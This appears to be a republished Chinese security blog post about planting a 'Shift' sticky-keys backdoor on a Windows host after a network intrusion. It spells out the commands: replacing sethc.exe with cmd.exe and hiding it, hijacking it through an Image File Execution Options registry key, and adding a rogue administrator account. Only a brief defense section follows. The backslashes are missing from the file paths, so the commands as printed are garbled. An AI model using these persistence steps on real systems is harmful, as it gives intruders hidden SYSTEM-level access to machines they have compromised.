0x00 前言
通常,在內(nèi)網(wǎng)滲透打下一臺機子之后,可以給這臺機子留個Shift后門。
0x01 Shift后門利用
簡介
粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動系統(tǒng)的粘滯鍵功能,其進程名為Sethc.exe,應(yīng)用程序在Windowssystem32下。
黑客用其它應(yīng)用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵,就會啟動黑客替換的應(yīng)用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠程計算機時,在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動該漏洞,進而控制遠程計算機。
漏洞原理
在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運行,并且此時應(yīng)用程序會以WINDOWS的最高權(quán)限-SYSTEM權(quán)限運行,所以計算機一旦被安裝該后門,入侵者便可悄無聲息地遠程操縱計算機。
漏洞利用
大致思路如下:
拿到目標(biāo)主機權(quán)限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;
其中,命令行方式為:
copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe attrib c:windowssystem32sethc.exe +h attrib c:windowssystem32dllcachesethc.exe +h
注意:要將dllcache文件夾中的緩存刪掉,否則會自動復(fù)原回去。
注冊表方式為:
REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"
命令說明:reg add是向注冊表添加記錄,后面跟的是注冊表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個目錄是用來設(shè)置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過/ v來指定鍵名,其中鍵名debugger是固定的,然后通過/ t來指定REG_SZ字符串類型,最后通過/ d來指定鍵的值,即被惡意替換的程序cmd.exe。
這樣,在下次遠程連接目標(biāo)主機登錄的時候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;
可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作;
當(dāng)然,上面的方法存在缺陷,就是可能會導(dǎo)致遠程連接無法持久進行,因此可以直接添加新用戶便于下次直接登錄:
net user mi1k7ea 123456 /add net localgroup administrators mi1k7ea /add'
防御方法
如果系統(tǒng)盤為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問;
直接將其刪除,最好的方法是在控制面板-輔助功能選項-粘滯鍵選項,將“使用快捷鍵”取消即可。;
通過注冊表設(shè)置實現(xiàn)防御;
審核編輯 :李倩
-
WINDOWS
+關(guān)注
關(guān)注
3文章
3524瀏覽量
88437 -
應(yīng)用程序
+關(guān)注
關(guān)注
37文章
3243瀏覽量
57605 -
Shift
+關(guān)注
關(guān)注
0文章
5瀏覽量
7461
原文標(biāo)題:Windows Shift后門利用
文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
評論